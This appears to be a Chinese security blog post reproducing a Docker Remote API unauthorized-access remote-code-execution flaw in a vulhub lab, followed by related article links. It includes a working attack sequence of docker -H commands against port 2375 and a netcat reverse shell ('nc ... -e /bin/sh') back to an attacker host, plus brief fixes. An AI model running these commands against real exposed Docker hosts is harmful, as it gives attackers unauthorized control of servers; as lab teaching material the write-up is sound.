从Docker Daemon API未授权访问到RCE

最新推荐文章于 2024-09-07 22:02:18 发布
最新推荐文章于 2024-09-07 22:02:18 发布
阅读量3.1k 收藏
点赞数
文章标签: docker 容器 运维 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/122123287
版权

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

REST API外置

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

 之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

 编译并启动环境

docker-compose up -d

漏洞利用

漏洞检测

docker -H tcp://192.168.17.140:2375 images

反弹shell

Step 1:在攻击者主机上监听9999端口

nc -lnvp 9999

 Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

 

 Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

 Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

 Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  sh
nc 192.168.17.128 9999 -e /bin/sh

 Step 6:在攻击主机中成功接收到shell

 Step 7:退出并删除容器

exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证

Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
docker授权rce+docker逃逸复现
weixin_54227009的博客
05-22 1579
这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 7142
一、漏洞介绍1.1漏洞成因 docker remote API授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
实训Day8 docker RCE漏洞
最新发布
m0_65590325的博客
09-07 729
实训内容
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1845
docker api授权导致rce 漏洞修复
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2646
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker授权漏洞利用,ssh密钥连接
Docker|漏洞】Docker api授权导致rce
wei的博客
05-28 1326
解决docker api授权导致rce漏洞修复
vluhub之docker-unauthoriun-rce复现
weixin_45006525的博客
08-07 1553
1.漏洞简介: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。 2.漏洞复现 环境介绍: 1.攻击机kali:192.168.231.128 2.靶机ubuntu:192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址:https://vulhub.org github下载:https://github.com/vulhub/vulh
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
docker daemon远程连接设置详解
09-30
特别是开启了远程连接后,任何能够访问到相应端口的用户都可以尝试连接并操作docker daemon,这可能导致系统安全威胁。因此,在设置之前,务必要评估潜在的安全风险,并采取额外的安全措施。 根据所使用的操作系统...
解决执行docker daemon命令时出错的问题
01-11
最近在工作中遇到了一个问题,在一开始执行docker daemon命令时总是会出错导致进程stop,按照网上的方法在/etc/fstab文件里添加了一行 none /sys/fs/cgroup cgroup defaults 0 0 这时Docker daemon可以起来了,...
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 2786
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3335
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
关于docker remote api授权访问漏洞的学习与研究
07-16 659
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker授权访问漏洞
qq_50854662的博客
10-18 1498
Docker授权访问漏洞
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2517
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 959
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 授权通过外网...
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7952
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker镜像下载源码分析:从DockerClient到DockerDaemon
Docker Server(Docker Daemon)接收到请求后,根据镜像名称解析出Registry地址,如果指定,则默认为DockerHub。接着,Docker Daemon会通过HTTPS连接到指定的Registry,发送认证信息(如果需要),然后请求镜像的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值